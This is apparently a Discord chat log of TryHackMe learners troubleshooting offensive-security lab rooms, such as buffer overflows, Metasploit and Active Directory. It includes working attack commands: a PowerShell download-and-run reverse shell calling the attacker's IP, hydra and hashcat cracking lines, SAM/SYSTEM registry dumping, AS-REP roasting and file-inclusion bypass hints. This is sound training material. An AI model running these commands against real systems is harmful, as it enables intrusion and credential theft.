#offensive-pentesting-path
what is exactly the difference between msfconsole and msfvenom?
can't I just do everything in msfconsole?
Msfvenom is a metasploit payload creator
Msfconsole is used to run metasploit modules
You can't create payloads from msfconsole
I don't have a kali to hand
Okay thanks. I've seen that you also can use msfvenom within msfconsole by just typing in the msfvenom command. I just have to figure out how to search for the different modules, payloads and stuff. It seems a bit confusing to me
That's just calling the "msfvenom" command - lots of commands in msfconsole work like that
could i get a little help with the file inclusion room challenge? feeling awful stupid
In which challenge do you need help?
so there's three flags, i got the first one, but stuck on the second
what i did so far was change the cookie value of THM to "admin"
this gave me the "this is a admin page, get the flag" message
|| try including file path as a cookie value ||
so i'm trying all sorts of chall2.php?file=/etc/flag2 things in the URL with this cookie enabled but to no avail
...not sure what you mean 😦
so i guess i'm not really understanding the whole concept of the entry point
cuz i read the forums and it says that cookie is the entry point, but i'm not sure how to use that
i'm so lost lol
it's alright, don't worry about it. i'll figure it out
thanks
got it 😄
||file path as the cookie value, use null byte to bypass the filter||
Phew. I just did brainstorm on my own. But let me tell ya, that was a long journey to get there!
I loaded a Windows VM just so I could debug the binaries found. Anyone know of some ready-made Windows VMs I can spin up that already have Immunity Debugger and friends for the future?
I used the tryhackme BOF basics machine
Which already has Immunity Debugger in it
I solved the BOF module using this VM and my automated BOF tool
hi
Hey i have an odd one
I have an audio processor with strings on a nonstandard port
What is that about
@wild folio this channel is for the tryhackme offensive pentesting path.
I just completed the Relevant CTF. Everything went fine until I had to do privilege escalation. I couldn't find any exploit for that Windows version or any service running on it.
Had to watch the walkthrough.
After watching the walkthrough, when I searched for the exploit like (the service name and exploit) with Windows version, I couldn't find the exploit either and had to copy the name from the walkthrough and search for it. Which I think in real life won't be possible.
How did you guys do this CTF?
See that you have SeImpersonate privilege
Use one of many exploits to turn that into system
I did, but I couldn't find the exploit by simply Googling. Tried for like 30 minutes straight and ended up just seeing the name of the exploit he used in the walkthrough, then googled that name and used it.
ooh Thank you so much @keen iris 🙂
hi in alfred machine i couldn't find root.txt
there is no root.txt
i terminated the machine and restarted it again
but nothing changed
the info says the file is in the windows/system32/config folder
i'm in there right now but there's no root.txt in there, and I also used "search -f root.txt" in meterpreter but couldn't find it
so any idea ?
okay
i found the root flag
but why i have to migrate i didn't understand
i was NT AUTHORITY\SYSTEM before migration
after migration same but i couldn't see root.txt
Hello, I could really use some help here. I'm working on my OSCP certification and got caught up on one of their Pen200 modules.. so I decided to come to tryhackme so maybe I would better understand how to tackle the Pen200. Now I'm stuck on tryhackme, lol. So I'm working on the 'Buffer Overflows' room. This room has a section where you're supposed to use gdb (I only know this from using the help / walkthrough I found online) to discover the 'special' function's memory address and then pass that address to the binary 'func-pointer'. I've been able to use the 'disassemble special' command in gdb to find the memory address to call the special function. I am converting the hex into ASCII, but this is where my problem is. There are no equivalent ASCII characters for x05 that I can seem to pass to the 'func-pointer' program. I can only pass the hex that has some associated ASCII characters. Perhaps someone can help me figure out how I'm doing this incorrectly, and how do you handle passing hex characters when the ASCII equivalent is 'blank'?
g@
I'll try rooms-help
I don't know how the room works. But how do you pass stuff to the program? Like .. is it a commandline argument or communication via netcat or ...
in some places, you can also copy&paste non-printable characters (because they are still there, they just don't have a visible letter to represent them). so create a file with these chars, copy the "text" and paste it.
Thank you, I just saw a video on someone's buffer overflow tutorial and he used print with python to put some hex into a file. So I may go that route. I appreciate you responding and thank you for the tip 🙂
Gave +1 Rep to @true hedge
Hi everyone, I've been trying to finish the room brainstorm for days now but I get this error when I try to load the application to the immunity debugger and I have no idea why. Does anyone have any ideas? I appreciate your help
Make sure you download it from FTP in binary mode
when I try to download it again the server tells me this and disconnects.
I'm playing Steel Mountain.
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
This is python2 code, does anyone know how to run it in python3?
modify it to py3 syntax
Hi
need help on brainstorm
my exploit working on my windows but not on box. couldn’t understand why.
Anyone had problems with Relevant? looks like it stops working after 1h and i am unable to terminate it. Happened 3 times already.
It shuts itself down at 1hr, it's a windows licensing problem
In task 5 of Exploiting AD, about keylogging a user to get the password of the keepass database, the process of the user don't spawn. How long does it take ?
The network has been up for 20min and we had some trouble with the connection so it was reset
does this path help me towards ecppt?
Hi
hey so I'm running into an issue using the Immunity Debugger. when I run the exploit for finding badchars, and I use the mona commands to compare the memory it gives me "invalid address used" NEVERMIND I'M SLOW
when it's 100% the ESP register value
Hey, I am a bit stuck on task 8, flag 3 in this room: https://tryhackme.com/room/fileinc
I understand that I need to bypass the filtering of non-alphabetic characters, and also make it not add .php at the end. Tried ....// instead of ../ and using %00, but none of these work, so I assume there is something else I must do.
I have been reading about $_REQUESTS, as the hint suggests, but haven't understood the connection to the task here. Been looking for it in the inspector in firefox, but haven't found it. Not sure if I am supposed to or not
I'm on the Alfred room and whenever I try to save the project I just get a "connection was reset" error, I have tried this multiple times.. is it meant to be that way?
I need help 🙏🏻
how can i debug this
@zinc niche Do not ask the same question over multiple channels, it is spam
This happened to me as well
Anybody had any problem with this room? I've been stuck here and the save is not working .. there is no way to build the project without the save
I suspect this is the MTU issue - there are steps in the pins in #site-support to resolve it
Something along the lines of sudo ip link set tun0 mtu 1200 ?
as that checks for mtu issues and tries to set it to sane values too
yo
hello
I'm facing a problem in Steel Mountain
In Task 4 the exploit is not working properly, showing this
I've done it as per the instructions, even watched the walkthrough. Do I have to change any code?
Okay I solved The Problem
question about buffer overflow prep
do you use the same file to finish all ten OVERFLOW tasks
I'll try this again:
I am a bit stuck on task 8, flag 3 in this room: https://tryhackme.com/room/fileinc
I understand that I need to bypass the filtering of non-alphabetic characters, and also make it not add .php at the end. Tried ....// instead of ../ and using %00, but none of these work, so I assume there is something else I must do.
I have been reading about $_REQUESTS, as the hint suggests, but haven't understood the connection to the task here. Been looking for it in the inspector in firefox, but haven't found it. Not sure if I am supposed to or not
have you tried using burp suite for said flag yet???
good luck
and remember that url encoding can get weird if you do not handle it properly making you unable to get the flag
did you figure it out? I can't get the program to crash whatsoever lol
I think my issue was that I was using 64-bit Windows, when I ran them in a 32-bit Windows vm they crashed at the correct number of bytes
Yes, just make sure that you change the prefix in the fuzzer and exploit to match the overflow task that you are working on
I'm trying to do Brainstorm in a Windows 7 VM and they were originally crashing at different byte sizes, but now it keeps crashing at 3600 bytes and when I use this number to generate the cyclic pattern and find the offset the exploit doesn't crash the server
ok ty
Gave +1 Rep to @crimson geode
i'm using Windows 8, got the exact match as 2xxx, i'm finding it hard to overwrite the EIP. my code stops working anytime i run the script. the chatserver responds with connection refused
don't know what i'm doing wrong
anyone done brainstorm room recently?
i've tried other codes online
same issue
i don't have access to upload a file
would have sent screenshot
hello there
Same issue as @eternal hare. Could you solve it?
Anyone some hints when or how the Trevor.local process spawns?
I found a message pinned in the "exploiting-ad" channel of the group "Networks". But the process is impacting all current users as it restarts the machine. I tried it a few times but it didn't work either.
Hi guys
Alfred room
i have a question about this command:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
for example if i load first the script
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/Invoke-PowerShellTcp.ps1','Invoke-PowerShellTcp.ps1')"
how can i run it? (2nd part of command)
Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
I know you have to enter the full command to answer the room's questions and get rshell
but just to understand and learn if you can do it separately.
Hey guys, what am I doing wrong? This is from the buffer overflow-brainstorm room. It's going in passive mode every time...
Connected to vpn
Machine is up and running
Yesterday it was the same
Connect to the ftp again, then type passive to toggle off passive mode
Thanks!!
how'd you fix it?
is it me or is anyone else's Jenkins server moving slow?
like i have to wait 2 mins before it allows me to put in a new command.
You have to change a little bit of code in exploit.py and run it twice
You will see what to change if you check the code
I was changing the code but was a little lost
Run it with python2
ok
Hello, I've reached the room Buffer Overflow Prep, which is a bunch of tasks with barely any explanation. I'm not good at buffer overflow attacks and I need a place to start. Could you please provide me a guide or a room that starts with the basics that should be done before this room
https://tryhackme.com/room/bof1 is probably the closest we get... otherwise just look at the writeups to learn from those
Not very helpful either, it assumes you already know more than a beginner would
Hufff
then it is read writeups and try and learn from those
Trying but not finding good resources to be honest
well shadow is in the same boat.... just not at that room in this path yet
Thank you, I'll check it
Gave +1 Rep to @wary glen
Any resource helps
Heyy Jo people. If you connect to some servers like an HTTP server or IMAP server with telnet or netcat, there are certain strings that you want to send to communicate with those servers. For example, when you communicate with an HTTP server with telnet, you would send 'GET / HTTP/1.1' and 'HOST: BLA'. My question is: is there any website or document where these strings are listed in a reader-friendly way for a lot of servers (for FTP, HTTP, IMAP, and all the other stuff, etc..)?
They're specified in the protocol documentation for said protocol.
Usually you just use nmap or a real client because it's easier than doing it manually
Odd question but anyone know of a good writeup for the last part of Steel Mountain. After 2 hours I feel like something's off.
hi. i'm trying to solve the Steel Mountain room. i'm trying to move the payload generated by msfvenom to the right directory on the target machine, but every time i try to move the file, it says "access denied"
any advice?
i'm trying to solve the same room. were you able to replace the service?
No I haven't gone back and tried yet. I was able to do everything except the last page where you have to manually do it.
oh ok. I'm gonna try that page in a couple of minutes. I got to replace service just now
Sorry didn't get a lot of sleep last night but I can't recall where on that page I stopped. I believe it was copying the code from the links and utilizing it.
no problem 🙂
Hi, I'm running the blue module and I've used metasploit to open a reverse shell to the target, but now my metasploit is opening a ton of sessions. Any thoughts as to what is going on? I'm on a kali virtual box connected over openvpn to thm.
What task page are you on? I think I remember there being a walkthrough that pointed out one catch to it
the first page, recon
Gotcha. Did you get that when attempting the nmap scan?
i got that after choosing the exploit, adding the reverse shell payload, and sending the run command. i got a shell, but then it continues to open sessions
Did you pick use 0 or use 3?
i did use 0
did you try finishing the terminal and run the exploit again?
it could be a random bug
^ you're about on track I believe without looking.
so any idea what metasploit is doing when it's opening all those sessions?
it eventually stopped after 279 sessions...
Did you set rhost and lhost? They mention in the video you might need to reboot both machines if it goes crazy.
It's repeatedly trying to open sessions and failing and creating new ones until it runs out of space to open new ones.
Start at the 6 minute mark in the video and go until 6 minute 45 seconds.
yeah, set the rhost according to the generated vm and set the lhost to my tun0 ip
i'm at a stable command prompt now so it seems to have settled down
If you ever need it to stop it when it goes off the rails Ctrl c will stop it.
this is my first time swapping to kali on a virtualbox, previously only used the attackbox so it was weird
thanks for the assistance @rigid arch
Gave +1 Rep to @rigid arch
Aw thanks! Remember like we were saying might need to reboot the machine and I believe it takes a few minutes after boot until you can reach the target machine.
Sometimes you have to ping the machines ip to make sure.
Or wake it up it seems.
if i'm not mistaken, the vulnerability used in this room uses a buffer overflow thing, so it may happen that the exploit run several times to take place
Yeah it's using the smb vulnerability if it's the Blue (Eternal Blue module).
haha, now i have 278 sessions in metasploit. I think I'll just restart the vm and start over.
precisely
hahahah xD
Did you figure out where you should put the CVE exploit on task 4 of steel mountain?
Wasn't sure if it was desktop, /usr/bin/ or the same as ncat.exe
Oh sweet look up steel mountain on YouTube by hackersploit. Found our answer!
They did a really awesome job of explaining the small details.
sorry, man. i did go to sleep before seeing the messages 😦
didn't know the channel. gonna see the video if I get stuck xD
Have you tried downloading it from the 'temp' directory?
Hi! I'm trying to complete the Blue room on this path, but can't seem to exploit Eternal Blue correctly (exploit runs, but not able to get a reverse shell). Not completely sure what I could be doing wrong, I'll post the error I receive
It does receive some valid responses back when running the exploit, but it can't establish the shell
can you show your options with show options
Sure
your lhost is very very wrong
Just realized that
Thanks very much
Gave +1 Rep to @vernal mason
no problem and good luck and have fun with the exploitation
Just to ask, but on the browser VMs you cannot use port 80 for any of the exercises as it's tied up with the browser VM control; correct?
Ergo you need it locally installed to a machine for the instructions to work when it calls for using port 80 for say http.server in python?
You can SSH in and then kill the service listening on port 80
Thank you! Now I need to figure out how to give rep. Haha
i was able to solve it. but thanks 🙂
Gave +1 Rep to @ember loom
Having some trouble with this part. Need to manipulate the path for /usr/bin/menu, but not really sure what to do
/usr/bin/menu runs as root, but I'm confused how to use it for privilege escalation
All good actually, was just overthinking it
Just ask your question, you'll get help faster.
In Lab #2, what is the directory specified in the include function?
Warning: include(includes/test) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab2.php on line 26
Warning: include() [function.include]: Failed opening 'includes/test' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab2.php on line 26
Can't post a screenshot
answer format: 8 letter word
On brainstorm room, I scanned TCP and UDP ports with nmap and found a number of ports. Though, it is not the answer of the first question. Anything I'm missing here? I could get the answer by brute forcing the answer but meh...
maybe it is just bugged or wrong ¯_(ツ)_/¯
how did you scan it?
A normal scan only scans the most common 1000 ports, maybe the room requires you to scan more than those.
I used -p- for port scan for tcp and udp
I want to do this path in one week. Is one hour per room realistic?
error from the room
How?
considering a huge amount of businesses and companies use active directory... yes it is important
AD is super fun.
shadow's main complaint is that Windows machines on tryhackme are not the fastest compared to Linux ones
Of course, Windows requires more resources than Linux
now the question is why does it require more resources than linux
cause of all the bloat that is in windows
I like the Edu version, it's somewhere between pro and enterprise, got student licenses through azure for students
I haven't tried that one before, next time I need one I'll give it a bash.
I'm in the HackPark machine, Task 3
The place where I'm supposed to upload the .acpx file and obtain a reverse shell doesn't seem to work
The file has my tun0 attacker-ip, the listener port (1234)
and nc -lvnp 1234 is just stuck forever after triggering the payload.. what am I doing wrong?
what command did you use to generate the aspx file
It's a public download at exploit-db
*acsx
I got it... typo in the file extension 😦 Wasted 1 day after this
I am having some issues on Brainstorm. Got everything working on my local system but it crashes the THM machine.. Any help here? I have tried different payloads. Still the same..
I can get root access on my own machine, But not the THM machine... 😦
after it crashes once you will need to reboot the target machine
Yeah i figured that much. but nothing helps. My exploit doesn't work. I even tried some different ones. If I type Netcat in I get the chatserver. But the exploit just crashes and no shell.
i even borrowed a shell that "works"
figured it out. my vpn was to blame. i ran the thm.troubleshoot script and the MTU value was off..
I got a problem with metasploit and SSL for the GAME ZONE box
Task 4, I've got my exploit and payload set up. Auth fail when I run it. Says
"[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number"
No results on Google. Looks like an SSL version mismatch... But do I downgrade it?? I'm not sure how to read into this. Can anyone help?
It worked finally. I just kept hitting run and the 10th time it connected.
I am doing the HackPark CTF, but still have no idea how to find the name of the clown which is displayed on the homepage (Task 1)
Did I miss something?
Reverse image lookup
thanks
I’m doing the brainstorm room, i tried connecting to the ftp with anonymous login, it allow anon login but when I try to list files it enters passive mode, i also tried using the Nmap script it says Anonymous FTP login allowed (FTP code 230) ….can’t get directory listing: Timeout .. am I missing something ?
Lol 😂 you are not alone, powershell sucks even more
Hi, guys. I have a problem with the Overpass 2 room. I tried to connect to port 2222, but the terminal outputs
Unable to negotiate with <ip> port 2222: no matching host key type found. Their offer: ssh-rsa
I googled it, and found an answer with -oHostKeyAlgorithms=+ssh-rsa. I tried it too, ssh tells me to authorize, then I write a CORRECT password, but nothing happened! Password is "||november16||".
You have to exit passive mode. When FTP "starts" type passive.
And before you mget all the files you need to enter binary mode, to ensure the files don't get corrupted
Thanks that worker
Gave +1 Rep to @vernal sluice
Worked*
Hey y'all, I reset the Daily Bugle room and no matter what I try I cannot crack the hash to the jonah account. Has anyone successfully done this room recently?
FWIW I have had John and Hashcat attempt this and both have run for hours
maybe it is not in your password lists... but if you think about it the password is something kinda obvious
also if you check the hash type you will notice it is one that is gpu resistant meaning yeah it takes a long time to crack
if you want a quicker crack here is a command you could try
sed -n '45000,50000p' <path-to-rockyou> | hashcat -m3200 -a0 --force '<hash>'
Thanks I’ll try that and see how it goes
working on my OSCP and really having a tough time with one of their coding exercises. I know it's simple but I'm not very good at coding. I need to create a Bash script that will ping a range of IPs you input as a variable and only reply back with hosts which are live. The syntax would be something like 'ping.sh 192.168.2 1 10'. This would ping IPs 1-10 on the 192.168.2.x subnet. Anyone able to assist?
I played daily bugle a couple weeks ago. You have a screenshot.
I ended up getting it to complete, my resource allocations for my VM got mucked up.
Room: Credentials Harvesting
Task 4: Local Windows Credentials
```
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[-] 'NoneType' object is not subscriptable
[*] Cleaning up...
```
why didnt it work?
Hm Strange, Tried a different method and it worked
Used the command below to dump the SAM and SYSTEM and used those files with impacket
reg save HKLM\SAM sam.bak; reg save HKLM\SYSTEM system.bak
hello
for the bufferoverflowprep - i did a few and then left... how do i pick up where i left off? when i try and load the .exe it starts me back at one... trying OVERFLOW 5 test - doesn't start the program at 5, just at 1 😦
You just change prefix in the python code.
you can even start at 10
The nc is just to check that the service is up and not in a crashed state 🙂
Just do the tasks religiously. It helps later 🙂
In Gatekeeper room, may i have to install my own Windows machine with immunity debugger?
yeah that is basically the idea... to have your own Windows VM with Immunity Debugger and mona
though you could technically cheat with using the buffer overflow prep target machine and just move the executable onto said target machine
Thank you!!!You made everything clear!!!!
Gave +1 Rep to @vernal mason
download the win 10 iso and install it on virtualbox or vmware?
darn, Microsoft discontinued the Edge debugging VirtualBox VMs
I’m on the brainstorm room and I can’t seem to find a fuzzer to crash the chat server program, any help? Or maybe I’m not doing it right
you are more or less intended to do that yourself using your own script made in python
My bad, I was connecting to the wrong one 🤦♂️
oh good you figured out the issue yourself
Probably a dumb question
For the buffer overflow tasks, do I have to complete all of them on the challenge VM?
It's incredibly slow and annoying
You can set up your own VM and download all the task files and do it there. and that's a good idea because you need the setup for later tasks.
IF your system has the resources.
Won't the addresses change?
Like, I should probably keep it a Windows 7, 32-bit, right?
(I always download tasks for later :P)
Not in the program. Just the IP.
I am solving the Daily Bugle room (Task2), but when I am executing the joomblah.py script it shows the following error message, please tell me how to fix it
```
[-] Fetching CSRF token
[-] Testing SQLi
Traceback (most recent call last):
  File "/home/kali/Desktop/daily_bugle/joomblah.py", line 186, in <module>
    sys.exit(main("http://192.168.10.100:8080/joomla"))
  File "/home/kali/Desktop/daily_bugle/joomblah.py", line 183, in main
    pwn_joomla_again(options)
  File "/home/kali/Desktop/daily_bugle/joomblah.py", line 147, in pwn_joomla_again
    tables = extract_joomla_tables(options, sess, token)
  File "/home/kali/Desktop/daily_bugle/joomblah.py", line 74, in extract_joomla_tables
    result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
  File "/home/kali/Desktop/daily_bugle/joomblah.py", line 46, in joomla_370_sqli_extract
    result += value
TypeError: can only concatenate str (not "bytes") to str
```
@drifting ibex What's the command you're using?
Thanks for trying to help me, just found a solution
Gave +1 Rep to @steady scroll
The Buffer Overflow Exploitation module is really fun, 10/10 would recommend, nocap frfr
hello, can someone point me to the right direction using a certain metasploit module?
I'm on the enumerating SMTP section and I need to use smtp_enum in metasploit to discover the system mail name
but actually metasploit with the given commands does not return the expected results
it scans and says aux. modules execution completed, but it does not say anything.
I heard this specific module is not great, is there any other way to discover it?
use pyenv to use python version 2.7.18 to run the exploit
Hello, I am trying to run hydra on http post login form but getting multiple passwords in response. Can somebody please guide me what am I doing wrong here? Here's my command sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.56.172 http-post-form "/Account/login.aspx:UserName=admin&Password=^PASS^:Login failed"
Try using -f ( so hydra stops when it finds a valid Cred )
and why run it with Sudo Privileges ?
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.56.172 http-post-form "/Account/login.aspx:username=admin&password=^PASS^:Login failed" -f -vv
Try this
Gave +1 Rep to @turbid notch
Thanks for the help. I tried adding cookies to the command and it worked sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.138.187 http-post-form "/Account/login.aspx:__VIEWSTATE=2mg4pY6EsI2J5q1OG1jLQ%2BpQ0lnzolWWzSPSyNzOXqPhqVQomQ243dzseoC9w4TZ%2FYaE%2BpMfcqSRMtmOdwh5ZxWKB%2B6JAire6gWxDleqv7GIt4RGA0EA8Hd%2FofoRgte%2F%2FrNaKb0pI3V%2BhbcKLRrf7%2BfuS%2BjJ4vh41wFWJsM2%2FYJXsrkO&__EVENTVALIDATION=YcMApz62%2B4jbOtkD5XtqW171khBIdohX9%2Fu2b6tciZGVoUZeuanljoHQwsB0Q%2FbLtsnvJ%2FEClKLr%2BbKe6qgKpGU1LqGqvufdIMGEw7HhbHDO6JbRE%2Fg5AE9ArDH1JJ3xp3gr5l4dtGuwUoEnYQjh3Q6YkhPjoWqqtFrEVtt%2BLQYU8i5D&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V
Well glad you found a way 🙂
Hey guys,
Need some help in the Alfred Room... I am trying to connect to the webserver using rev shell and cmd keeps failing due to an & 'ampersand' error. Can someone explain me my error!
It's not failing on you .
You are not Uploading the shell right
You might be doing it wrong @sour silo
Go to Jenkins > Project, add the command in the build section. Save it, come back and then keep your listener ready and just execute it
Don't forget to start a webserver for that Powershell file
and then getting a connection back to your Listener
Anyone tried the "Internal" machine today? I am having problems with it, can't log in with the credentials I found.
If you found root creds, you won't be able to log in with the same shell using the SU command. Log in with SSH.
I do understand this part. I have the webserver running on 8000 and I do get an HTTP 200 every time I run the build before the ";" part of the command. I also have an NC running on 9000 as well. The thing is what is the error saying, I don't get that. One more thing, after like 4 tries I referred to a writeup but the error was still there.
Well I have no idea either
All I can notice is 2 errors it's giving you
verify the path and check spellings
Invoke-expression : ampersand not allowed
you might wanna Google em or use chatgpt 🙂
I won't mind if you can show me ( how you're doing it ) in VC .
The path and spell check is good. The only thing I don't get is ampersand not allowed
Well wait a sec, send me a DM, I'll screenshare the CTF and you can see what's happening.
Well right now I'm leaving for uni so I won't be able to, but will DM or ping when able.
sure
I'm doing Attacktive Directory room (Task 5), but when I'm executing GetNPUsers.py, it shows the following error message, is there something I'm doing wrong?
Try this
./GetNPUsers.py -dc-ip ip spookysec.local/svc-admin -no-pass
The domain is named spookysec.local not spooky.local
@fleet wedge Looks like I really need a nap right now 🤣
@fleet wedge Thanks for your help
Gave +1 Rep to @turbid notch
Hi team, I got a question about the Active Directory "sub path". Why is there a time limit in certain rooms? For some rooms I see a "You have access to this room for a limited time" and on the top left corner something like "3 days of access left". What happens after that time expires?
Oh OK, I see. Cool! I found it a little odd since it was the first time I joined some of those rooms. Thanks for clarifying!
Lolz . No worries
I was supposed to log through the browser, at least it is how the writeup shows
**Spoiler Alert**
we use SSH tunnelling to make it available to us, hack it and then get root creds and that's about it
that's what I meant when I said when you find root creds you won't be able to log in via the SU command
You'll have to log in through SSH and get the root flag
it is some url like ip/blog/wp-login.php
yep.. but before uploading the reverse shell we need to find "admin" password and log into wordpress through browser so we can upload the rev shell
You have to hack WordPress, get the panel and upload a PHP reverse shell.
I am not being able to log into wordpress through browser
what creds did you find?
admin and a password
Yeah what was the username and the pass ?
login:admin password:my2boys
Sound about right
ooh did you add Internal.thm to your hosts file?
I think there is some bug
no
Well you have to
ok..
that's why you can't see the blog or the wordpress login panel right
I never had to add any name into my /etc/hosts
go to /etc/hosts, add the ip and then internal.thm
ok. thank you!
I will try it when I get home
I never had to add any name to /etc/hosts on tryhackme machines
I thought there was some default configuration
Well if you watch his video he Did the same .
i was stuck there for a while as well cuz mostly if that's the case it's mentioned, but i think the creator forgot to
I am using the AttackBox and Kali from web browser
I think you still have to add it to your host file
not sure but why not try it
I always use VPN
I like attackbox, I can use it from anywhere
Lolz, I also forgot to remove it from my hosts file
lol
True, but you can also use your terminal using SSH from anywhere 🙂 It doesn't suck and it's way faster.
Now that you are playing Internal
what are your plans regarding buffer overflows?
Well, I try to do one machine a day.. of course it doesn't always work, because I usually have 3h-5h to try it each day
if I own Internal today I might start the buffer overflow rooms
also today
I've never done any buffer overflow vulnerability
not that I remember
Well, it's not a walkthrough room. As they defined it, it tests you
and I haven't found much of a guide regarding it in THM either
Some people suggested I learn it from somewhere else
But personally I just moved to Active Directory
As THM says: "Please note that this room does not teach buffer overflows from scratch. It is intended to help OSCP students and also bring to their attention some features of mona which will save time in the OSCP exam."
nice
this is what I was looking for anyway... some rooms that prepare for OSCP, I may try it in the future
yeah, I plan the same
I'll just complete the other stuff and move to Networks & Red Teaming for now.
I will try Buffer Overflow. If it takes too much time I might stop trying the machines a little and study a bit more about buffer overflows
Hello family and friends?
ello
Hello friends, anyone getting an error in the room Lateral Movement and Pivoting?
the nslookup fails. I have already done 'Breaching AD' and 'Enumerating Active Directory'
How are you?
Hi,
I am trying to solve the Gatekeeper room and while testing for BoF my script is failing to fuzz.
It keeps on crashing in the first iteration whereas when I used netcat the data flows as required.
First Connection is when connected from netcat and second is when connected via script.
Have you tried to run it with a different version of Python? E.g.:
python3 fuzz.py (try python2 and python)
Same here for “Exploiting AD” room both from attackbox and vpn
Yes, getting the same issue.
oh right, that is the one shadow cracked with Ruby instead of Python
before shadow figured out how pyenv and virtualenv and venv worked
Thanks man a lot!
Gave +1 Rep to @vernal mason
no problem
I finished Jr Pentester path and started Offensive Pentesting. First room was Alfred. Am I supposed to solve this on my own? Because I had to look up a walkthrough video and I feel like a loser lol.
no, this is a good idea, I should do that
Hi, I have a question about the buffer overflow room
I did the right steps to get the offset of OVERFLOW2 but it's wrong. I tried different msf pattern bytes and I still get the same offset
So why is it wrong? What mistakes am I making?
That is not possible. Maybe you typed something wrong in the exploit.
I am in buffer overflow room and I do not really understand what is going on. Can you recommend some learning resources on this for a beginner?
Hi everyone! I hope you enjoyed this video. Please do consider subscribing so we can continue making awesome hacking content! You can find more awesome content and courses at https://academy.tcm-sec.com
Timestamps below:
0:00 - Introduction
1:23 - Downloading Our Materials
7:43 - Buffer Overflows Explained
11:56 - Spiking
22:12 - Fuzzing
28:...
That is a really good start. Explains a lot of things to get you started.
Also read up on buffer overflow basics 🙂
I think I should get a book on C haha
Don't need to know C for buffer overflow 😛 When you understand the simple basics of BOF it just clicks.
But the OSCP BOF room is not good for understanding BOF.
It is a practice room. So if you don't understand it right now, just read a little and do vulnserver, and watch some videos explaining it, you will get there 🙂 I don't know almost any C and I managed the room and Brainpan, Gatekeeper.
hey guys
I'm having issues in the Alfred room
after putting in the payload
powershell iex (New-Object Net.WebClient).DownloadString('http://10.2.27.62:1234/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.2.27.62 -Port 9001
that's my IP
I click on apply and immediately I click on save, and the site crashes
is there an admin here or a mod?
Why do you need a mod/Admin?
Mods/admin != Site staff.
(With the exception of Fontaene, Jabba, Ben)
I wonder if it's because you have
Invoke-PowershellTcp.ps1%27
nope
powershell iex (New-Object Net.WebClient).DownloadString('http://10.2.27.62:1234/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.2.27.62 -Port 9001
I think Discord is doing that
it's the same payload from the Alfred lab
Hello,
I'm in the Basic Pentesting room, and I try to get a username and password from port 80 using nmap --script smb-brute -p 80 <IP>, but it just outputs that port 80 is open and the MAC address. What am I doing wrong?
I've also tried doing http-brute, same thing
It says in the Hint that I should use SMB, which I did 🤔
well, SMB is definitely not running on port 80
Should I access a pathway?
I did it on the open port 445 and it says no accounts found 😩
have you tried the script called smb-enum-users
nmap --script smb-enum-users -p 445 <IP> gives nothing too
Gives
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: <mac address>
---
-- @usage
-- nmap --script smb-enum-users.nse -p445 <host>
-- sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>
Didn't work
Same for me, for some reason
nmap --script smb-enum-users.nse -p445 <host>
eh, meep it... just assume there is an anonymous user on SMB there and use smbclient to connect to the share
also known as doing smbclient -L //iphere/
Says "Enter WORKGROUP/root's password:"
Weird thing is the task wants me to enter a username...
just hit enter on that prompt
Hi, I am in the Buffer Overflow Prep room. I am looking for bad characters using mona as described in the room: !mona compare -f C:\mona\oscp\bytearray.bin -a <address>. The room says: "Repeat the badchar comparison until the results status returns 'Unmodified'. This indicates that no more badchars exist."
However, I cannot get to this point. I remove the bad characters from the payload and generate the bytearray using !mona bytearray -b "\x00", adding the bad characters I found, but the compare function always returns the bad characters I already removed
You have to add them to the command: !mona bytearray -b "\x00 IN HERE"
and generate a new byte array to send without those characters
I did that, but I found out it was caused by not updating the address on the second run
Ahhh. Well, you learned something new then 🙂
Whenever I do nmap -P80 (or any other port) it says "Illegal argument to -P, use -Pn, -PE, (etc, etc)
Ah gotchu
Btw I'm still on the Basic Pentesting room, and port 80 is open with an Apache server. I tried nmap --script ajp-brute -p8009 <IP> because "AJP Jserv" is on that port, but it says it doesn't need a login
The answer needs a username and password tho
I found a hidden directory with the name "development" earlier, which I'm intending to get into, but the question is how I brute force the server's username and password
*points at hydra*
Never heard of it. Will have to read up on it on the practice part of THM
It is a good tool to know, and I definitely recommend checking it out and reading up on it
Weird thing is that this room was under "Based on your experience", but it doesn't seem as if I'm there quite yet
There are quite a few rooms on TryHackMe where hydra is the answer to get in
yeah, fair
But hey, trying out stuff you don't understand makes you realize you are still green as hell haha
hey guys
I'm doing Daily Bugle
after I put in my reverse shell
and try to save it, it loses connection
anyone know why?
Does it happen when you save the PHP file, not when you are accessing it again?
Worth checking that your machine/room has not exceeded the expiry counter
Vm
Can anyone help me with the Brainstorm room? I downloaded chatserver.exe but I cannot open it in Immunity Debugger, it's saying I need 64-bit
nc -lvnp port number
example: nc -lvnp 4444
If you have the file locally on your machine, you can send it to the Windows machine in the Buffer Overflow Prep room 🙂 I personally made my own x64 VM, felt it was a bit smoother. But I have the machine resources.
yes, I did download the file locally but it doesn't open
And do you know what your system is?
the print screen now is x64
I tried it on Kali Linux physical and Kali Linux VM and Windows 10 Pro 64-bit
but on Windows 10 Pro 32-bit it opened
